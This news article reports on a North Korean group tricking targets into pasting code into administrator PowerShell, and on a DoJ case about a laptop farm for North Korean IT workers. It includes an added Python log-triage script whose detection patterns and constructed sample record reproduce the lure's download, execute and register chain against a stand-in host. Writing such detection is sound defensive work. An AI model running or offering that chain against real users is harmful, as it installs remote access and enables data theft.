A N. Korea-linked threat actor known as Kimsuky has been observed using a new technique: it cons targets into running PowerShell as an administrator & then instructs them to paste & run attacker-supplied code in that elevated session.
“To execute this tactic, the threat actor masquerades as a S. Korean Govt. official & over time builds rapport with a target before sending a spear-phishing email with a PDF attachment,” the Microsoft Threat Intelligence team said in a series of posts shared on X.
PDF document
To read the supposed PDF, victims are persuaded to click a URL that leads to a list of steps for ‘registering’ their Windows system. The registration page urges them to launch PowerShell as an administrator, paste the displayed lines of code into the console & execute them. Because the victim performs the paste in an already-elevated session, the code runs with administrator rights from the outset; no exploit or privilege-escalation step is needed.
If the victim follows through, the pasted code downloads & installs a browser-based remote desktop tool, along with a certificate file with a hardcoded PIN, from a remote server.
“The code then sends a web request to a remote server to register the victim device using the downloaded certificate & PIN. This allows the threat actor to access the device & conduct data exfiltration,” Microsoft commented.
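The chain described above leaves a record if PowerShell script block logging is turned on: the pasted block is written to the Microsoft-Windows-PowerShell/Operational log as event 4104. The following Python triage is an added example, not Microsoft's detection logic or code from the article. It assumes each record carries the ScriptBlockText and Path fields of event 4104 joined with the host process's IntegrityLevel as Sysmon event 1 reports it, and its indicator patterns, weights and threshold are illustrative, derived only from the behaviour the article describes. The sample records are constructed; the hostnames use the reserved .invalid domain and resolve to nothing.

```python
"""Heuristic triage of PowerShell script-block log records for the
"paste this into an elevated PowerShell" pattern described above.

Added example, not Microsoft's detection logic or code from the article.
Assumptions: each record carries the ScriptBlockText and Path fields of
Microsoft-Windows-PowerShell/Operational event 4104, joined with the host
process's IntegrityLevel as Sysmon event 1 reports it; the indicator
patterns, weights and threshold are illustrative, derived only from the
behaviour the article describes.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicators of the chain: fetch a payload and a certificate, run the payload
# with a hard-coded PIN, then POST a registration request.
INDICATORS = {
    "download": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
        r"Start-BitsTransfer)\b|Net\.WebClient", re.I),
    "executable_dropped": re.compile(r"-OutFile\s+\S+\.(exe|msi|zip)\b", re.I),
    "certificate_dropped": re.compile(r"-OutFile\s+\S+\.(pfx|p12|crt|cer|pem)\b", re.I),
    "hardcoded_pin": re.compile(r"\bpin\b\s*[=:]?\s*['\"]?\d{4,}", re.I),
    "executes_download": re.compile(r"\b(Start-Process|Invoke-Expression|iex)\b|&\s*\S+\.exe", re.I),
    "registration_post": re.compile(r"-Method\s+Post\b", re.I),
}
WEIGHTS = {"download": 1, "executable_dropped": 2, "certificate_dropped": 2,
           "hardcoded_pin": 2, "executes_download": 1, "registration_post": 1}
THRESHOLD = 7  # illustrative; tune against your own baseline


@dataclass
class Finding:
    score: int
    hits: list[str] = field(default_factory=list)
    suspicious: bool = False


def score_event(event: dict, threshold: int = THRESHOLD) -> Finding:
    text = event.get("ScriptBlockText", "")
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    score = sum(WEIGHTS[name] for name in hits)
    # Event 4104 leaves Path empty for commands typed or pasted at the console.
    # A multi-line block with no backing .ps1 file is exactly what the lure asks for.
    if not event.get("Path") and "\n" in text.strip():
        hits.append("pasted_interactively")
        score += 1
    # The lure tells the victim to open PowerShell as administrator.
    if event.get("IntegrityLevel") == "High":
        hits.append("elevated_host")
        score += 1
    return Finding(score, hits, score >= threshold)


def triage(events: list[dict]) -> list[Finding]:
    return [score_event(e) for e in events]


# Constructed sample records (nothing here resolves; .invalid is reserved).
SAMPLE_EVENTS = [
    {   # the lure chain, shaped as the article describes it
        "ScriptBlockText": r"""$u = 'https://portal.example.invalid'
Invoke-WebRequest -Uri "$u/agent.exe" -OutFile $env:TEMP\agent.exe
Invoke-WebRequest -Uri "$u/device.pfx" -OutFile $env:TEMP\device.pfx
Start-Process $env:TEMP\agent.exe -ArgumentList '--pin 443201' -Wait
Invoke-RestMethod -Uri "$u/register" -Method Post -Body @{pin='443201'}""",
        "Path": "",
        "IntegrityLevel": "High",
    },
    {   # ordinary interactive admin work
        "ScriptBlockText": "Get-ChildItem C:\\Logs -Filter *.log | Select-String 'error'",
        "Path": "",
        "IntegrityLevel": "Medium",
    },
    {   # a legitimate deployment script run from disk
        "ScriptBlockText": "Invoke-WebRequest -Uri https://updates.example.invalid/x.msi "
                           "-OutFile C:\\pkg\\x.msi\n"
                           "Start-Process msiexec -ArgumentList '/i C:\\pkg\\x.msi /qn' -Wait",
        "Path": "C:\\deploy\\install.ps1",
        "IntegrityLevel": "High",
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if finding.suspicious else "ok"
        print(f"{flag:10} score={finding.score:2} hits={finding.hits}")
```

The deployment script in the third record uses the same download-and-run cmdlets as the lure but has a backing file path and no certificate or PIN, so it stays below the threshold; the point is that the combination of indicators, not any single cmdlet, is what separates the lure from routine administration. Script block logging is off by default and must be enabled through the “Turn on PowerShell Script Block Logging” policy before event 4104 is written at all.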
Limited Attacks
Microsoft said it has observed this approach in limited attacks since Jan. 2025, describing it as a ‘departure’ from the threat actor’s usual methodology.
It is worth noting that Kimsuky is not the only N. Korean hacking group to adopt this compromise strategy.
In Dec. 2024, it was revealed that threat actors linked to the ‘Contagious Interview’ campaign were tricking users into copying & executing a malicious command on their Apple macOS systems via the Terminal app, ostensibly to fix a problem with accessing the camera & microphone through the web browser.
Such attacks, along with those that use the so-called ClickFix technique, have surged in recent months, in part because they rely on the targets to infect their own machines: the victim runs the command in a legitimate, often elevated, interpreter, so there is no exploit or malicious attachment for email & endpoint controls to catch, & the initial execution looks like ordinary administrator activity.
Laptop Farm for N. Korean IT workers
The development comes as the US Dept. of Justice (DoJ) revealed that a 48-year-old woman from Arizona has pleaded guilty to her role in a fraudulent IT worker scheme that allowed N. Korean threat actors to obtain remote jobs at more than 300 US companies by posing as US citizens & residents.
The activity generated over $17.1m in illicit revenue for Christina Marie Chapman & for N. Korea, in violation of international sanctions, between Oct. 2020 & Oct. 2023, the dept. stated.
Steal the Identities
“Chapman, an American citizen, conspired with overseas IT workers from Oct. 2020 to Oct. 2023 to steal the identities of US nationals & used those identities to apply for remote IT jobs &, in furtherance of the scheme, transmitted false documents to the Department of Homeland Security,” the DoJ said.
“Chapman & her co-conspirators obtained jobs at 100 US companies, including Fortune 500 corporations, often through temporary staffing companies or other contracting organisations.”
Arrested
The defendant, who was arrested in May 2024, has also been accused of running a laptop farm by hosting multiple laptops at her residence to give the impression that the N. Korean workers were working from within the country, when, in reality, they were based in China & Russia & remotely connected to the companies’ internal systems.
“As a result of the conduct of Chapman & her conspirators, more than 300 US companies were impacted, more than 70 identities of US persons were compromised, on more than 100 occasions false information was conveyed to DHS, & more than 70 US individuals had false tax liabilities created in their name,” the DoJ added.
IT Worker Scheme
The increased law enforcement focus has led to an escalation of the IT worker scheme, with reports emerging of data exfiltration & extortion.
“After being discovered on company networks, N. Korean IT workers have extorted victims by holding stolen proprietary data & code hostage until the companies meet ransom demands,” the US Federal Bureau of Investigation (FBI) said in an advisory last month.
“In some instances, N. Korean IT workers have publicly released victim companies’ proprietary code.”